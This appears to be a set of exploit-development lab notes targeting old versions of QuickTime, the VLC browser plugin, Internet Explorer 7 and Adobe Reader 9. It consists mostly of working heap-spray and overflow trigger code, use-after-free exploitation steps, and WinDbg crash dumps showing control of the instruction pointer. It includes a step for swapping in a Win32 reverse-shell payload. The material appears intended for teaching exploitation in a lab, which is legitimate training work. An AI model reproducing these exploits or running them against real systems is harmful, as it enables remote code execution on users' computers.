Browser Exploits

1. ################################
2. # Lab 1: Overflows in browsers #
3. ################################
4.  
5. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
6. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
7.  
8. <object id=quicktime clsid="999-999999-99-99999">
9. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
10. </object>
11.  
12. var buf = "";
13. for(i = 0; i < 50000; i++)
14. buf += "A";
15. var myobject = document.getElementById("quicktime");
16. myobject.url = buf;
17.  
18. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
19.  
20. - Browsers (Flash)
21. - PDF
22. - MS Office / OOo
23.  
24. VLC smb:// exploit
25. ------------------
26.  
27. EXPLOIT VECTOR
28.  
29. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
30.  
31. Exploit Scripts
32. - ffvlc
33.  
34. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
35.  
36. perl daemon.py vlc0.html
37.  
38. ON YOUR XPIE8 VM, START FIREFOX
39. Browse to http://your_host_ip_address:8080/
40.  
41. vlc0.html
42. ---------
43. <script>
44. var buf = "";
45. for(i = 0; i < 1250; i++)
46. buf += unescape("%41%41%41%41");
47. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
48. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
49. </script>
50.  
51. vlc1.html
52. ---------
53. <script>
54.  
55. // shellcode created in heap memory
56. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
57.  
58. // 800K block of NOPS
59. var nop = unescape("%u9090%u09090"); // 4 NOPS
60. while(nop.length < 0xc0000) {
61. nop += nop;
62. }
63.  
64. // spray the heap with NOP+shellcode
65. var memory = new Array();
66. for(i = 0; i < 50; i++) {
67. memory[i] = nop + shellcode;
68. }
69.  
70. // build the exploit payload
71. var buf = "";
72. for(i = 0; i < 1250; i++)
73. buf += unescape("%41%41%41%41");
74. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
75.  
76. // trigger the exploit
77. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
78. </script>
79.  
80. perl daemon.py vlc1.html
81.  
82. Search for where our NOPS+shellcode lies in the heap
83.  
84. s 0 l fffffff 90 90 90 90 cc cc cc cc
85.  
86. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
87. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
88. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
89. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
90. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
91. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
92. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
93. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
94. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
95. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
96. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
97. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
98. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
99. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
100. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
101. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
102. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
103.  
104. Edit vlc2.html
105. replace %41%41%41%41 with %07%07%07%07
106.  
107. (928.fd0): Break instruction exception - code 80000003 (first chance)
108. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
109. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
110. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
111. 07100000 cc int 3
112. 0:019> u
113. 07100000 cc int 3
114. 07100001 cc int 3
115. 07100002 cc int 3
116. 07100003 cc int 3
117. 07100004 cc int 3
118. 07100005 cc int 3
119. 07100006 cc int 3
120. 07100007 cc int 3
121.  
122. Create vlc3.html (Copy vlc2.html to vlc3.html)
123. ----------------------------------------------
124. Win32 Reverse Shell
125. - no restricted characters
126. - Encoder NONE
127. - use the Javascript encoded payload generated by msfweb
128.  
129. USE AFTER FREE
130. --------------
131.  
132. struct {
133. int a;
134. int b;
135. void (*add)();
136. char c[20];
137. } s1, s2;
138.  
139. s1.a = 3;
140. s1.b = 4;
141. s1.add = my_add_func();
142. strcpy(s1.c, "AAAAAAAAAAAAAAAAAAAAAAAAAAAA");
143. :
144. :
145. s2.add(x, y);
146. :
147.  
148. Exploit scripts
149. ie7-ms09002
150.  
151. perl daemon.py ie7imgtag0.html
152.  
153. First chance exceptions are reported before any exception handling.
154. This exception may be expected and handled.
155. eax=025445a0 ebx=00000000 ecx=4141ffff edx=00000002 esi=02545678 edi=80020003
156. eip=7e8999cb esp=01e8f68c ebp=01e8f694 iopl=0 nv up ei pl nz na po nc
157. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
158. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Internet Explorer Collection\IE700\mshtml.dll -
159. mshtml!DllGetClassObject+0x4ec28:
160. 7e8999cb ff5104 call dword ptr [ecx+4] ds:0023:41420003=????????
161.  
162. WHENEVER YOU HAVE A CRASH WHERE YOU FAULT ON:
163.  
164. call dword ptr [reg + N]
165.  
166. You control the reg value (completely or partially)
167.  
168. You have an exploitable vtable overwrite.
169.  
170. u eip-3 <--- check 3 instructions before the crash
171. 0:005> u eip-3
172. mshtml!DllGetClassObject+0x4ec25:
173. 7e8999c8 8b08 mov ecx,dword ptr [eax]
174. 7e8999ca 50 push eax
175. 7e8999cb ff5104 call dword ptr [ecx+4]
176.  
177. dd eax
178. 0:005> dd eax
179. 025445a0 4141ffff 00420042 00420042 00420042
180. 025445b0 00420042 00420042 00420042 00420042
181. 025445c0 00420042 00420042 00420042 00420042
182. 025445d0 00420042 00000042 e8b9ce43 ff080100
183.  
184. %u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
185.  
186. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
187. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
188. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
189. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
190. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
191. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
192. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
193. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
194. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
195. :
196. :
197.  
198. EAX register ends up pointing to one of these src values
199. %u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
200.  
201. EAX points to ---> 4141ffff B B B B B B ...
202. mov ecx, [eax]
203. - what will ecx be? ECX = 4141ffff
204. push eax
205. call dword ptr [ecx+4]
206. - EIP will jump to whatever is at memory location 4141ffff+4 = 41420003
207.  
208. ie7imgtag1.html
209. ---------------
210.  
211. var buf = unescape("%u0606%u0606BBBBBBBBBBBBBBBBBBBBBBBBB");
212.  
213. EAX points to ---> 0606ffff B B B B B B ...
214. mov ecx, [eax]
215. - ecx = 0606ffff
216.  
217. call [ecx+4]
218. - call [06070003]
219.  
220. Do we control the memory at 06070003?
221.  
222. dd 04040404 ........ 90 90 90 90 90 90 90
223. dd 05050505 ........ 90 90 90 90 90 90 90
224. dd 06060606 ........ 90 90 90 90 90 90 90
225.  
226. 06070003 --> 90909090
227.  
228. dd 07070707 ........ 90 90 90 90 90 90 90
229.  
230. EIP = 90909090 (whatever is stored at location 06070003)
231.  
232.  
233.  
234.  
235.  
236.  
237. #######################
238. # Lab 2: PDF EXPLOITS #
239. #######################
240.  
241. Acrobat Media newPlayer exploit
242. -------------------------------
243.  
244. Use-after-free bug
245.  
246. Exploit scripts are online at 172.16.0.100
247. - adobe_mnp
248.  
249. Download these scripts on your XPIE8 VM itself.
250.  
251.  
252. mnp0.pdf
253.  
254. - Open up acrobat reader
255. - WinDBG
256. - F6 attach to AcroRd32.exe
257. - g to Go
258.  
259. EIP = 41414141
260.  
261. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
262.  
263. mnp1.pdf
264.  
265. All we are doing is changing EIP to 0c0c0c0c.
266. There is no heap spray in this one.
267.  
268. This exception may be expected and handled.
269. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
270. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
271. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
272. 0c0c0c0c ?? ???
273.  
274. We know we get EIP control
275.  
276. mnp2.pdf
277.  
278. Put in the heap spray.
279.  
280. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
281.  
282. var nops = unescape("%u9090%u9090");
283.  
284. while(nops.length <= 32768)
285. nops += nops;
286. nops = nops.substring(0,32768 - shellcode.length);
287.  
288. memory = new Array();
289.  
290. for(i = 0; i < 1500; i++) {
291. memory[i] = nops + shellcode;
292. }
293.  
294. 1500 NOP+shellcode blocks of 32K NOPs each
295.  
296. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
297.  
298. We want to see what led to the crash.
299.  
300. EIP is invalid, so we can't disassemble around EIP
301.  
302. We need to trace the function that called us and crashed.
303. - STACK TRACE
304. - Dumps all the frames from the top of the stack.
305. - show you the series of calls that led up to the crash.
306. - we will analyze the topmost function on the frame.
307.  
308. WinDBG - stack trace - "k" command
309.  
310. 0:000> k
311. ChildEBP RetAddr
312. WARNING: Frame IP not in any known module. Following frames may be wrong.
313. 0013fb34 2d843117 0x90909090
314. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
315. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
316. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
317. 0013fca4 238543c5 EScript!PlugInMain+0x24432
318. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
319. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
320. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
321. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
322. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
323. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
324. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
325. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
326. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
327. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
328. 0013ffc0 7c817067 AcroRd32+0x4004
329. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
330.  
331. 2d843117 -- the return address that we would have returned to, if we didnt crash.
332. address 2d843117-2 we will have a CALL instruction.
333.  
334. u 2d843117
335. u 2d843117-2
336. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
337. u 2d843117-4
338.  
339. 0:000> u 2d843117-3
340. Multimedia!PlugInMain+0x41b66:
341. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
342. 2d843117 6a00 push 0
343. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
344. 2d84311e 56 push esi
345. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
346. 2d843124 83c40c add esp,0Ch
347. 2d843127 66b80100 mov ax,1
348. 2d84312b 5e pop esi
349.  
350. We control EDX
351. edx=0c0c0c0c
352.  
353. call [edx+4] = call [0c0c0c10]
354. dd edx+4
355.  
356. 0:000> dd edx+4
357. 0c0c0c10 90909090 90909090 90909090 90909090
358. 0c0c0c20 90909090 90909090 90909090 90909090
359.  
360. 0:000> u 2d843117-7
361. Multimedia!PlugInMain+0x41b62:
362. 2d843110 8b10 mov edx,dword ptr [eax]
363. 2d843112 8bc8 mov ecx,eax
364. 2d843114 ff5204 call dword ptr [edx+4]
365.  
366. dd eax
367.  
368. 0:000> dd eax
369. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
370. 02e2d690 42424242 42424242 42424242 42424242
371. 02e2d6a0 42424242 42424242 42424242 42424242
372. 02e2d6b0 42424242 42424242 42424242 42424242
373. 02e2d6c0 42424242 42424242 00000000 00000000
374.  
375. mnp3.pdf
376.  
377. change the NOPs 90909090 to 0c0c0c0c
378.  
379. mov edx, [eax]
380. call [edx+4]
381.  
382. edx = 0c0c0c0c
383. edx+4 = 0c0c0c10
384. contents at edx+4 will also be "0c0c0c0c"
385.  
386. EIP will jump to 0c0c0c0c
387.  
388. and...
389.  
390. 0:000> u 0c0c0c0c
391. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
392. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
393. 0c0c0c0c 0c0c or al,0Ch
394. 0c0c0c0e 0c0c or al,0Ch
395. 0c0c0c10 0c0c or al,0Ch
396. 0c0c0c12 0c0c or al,0Ch
397. 0c0c0c14 0c0c or al,0Ch